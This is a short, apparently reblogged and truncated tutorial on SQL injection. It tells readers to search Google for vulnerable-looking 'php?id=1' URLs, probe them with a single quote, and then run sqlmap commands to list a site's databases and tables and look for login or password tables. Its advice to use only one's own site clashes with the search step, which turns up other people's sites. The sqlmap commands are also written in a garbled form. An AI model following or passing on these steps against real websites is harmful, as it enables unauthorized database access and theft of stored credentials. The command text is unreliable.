How to test if a website is vulnerable to SQL injection. To be legal, use your own website.
Step 1 – Google for php?=id1
Google for php?=id1
add a Single quote… to the end of the URL.
so it reads php?=id1′
If you get an error the website is vulnerable. Go to step 2.
If this is your own website – shut it down immediately. You need to secure it before you bring it back online.
Step 2 – Kali SQLMAP – get website databases
SQLMAP – u http:website.com/page.php?id=1 –dbs
This will fetch all available databases on the website. Did you see them listed?
Step 3 – Find the LOGIN table
SQLMAP – u http:website.com/page.php?id=1 –D www – tables
Did you see all the TABLES on the website list out?
Look for likely targets… eg Login, username or password table.
If you’re not on your own website…
View original post 96 more words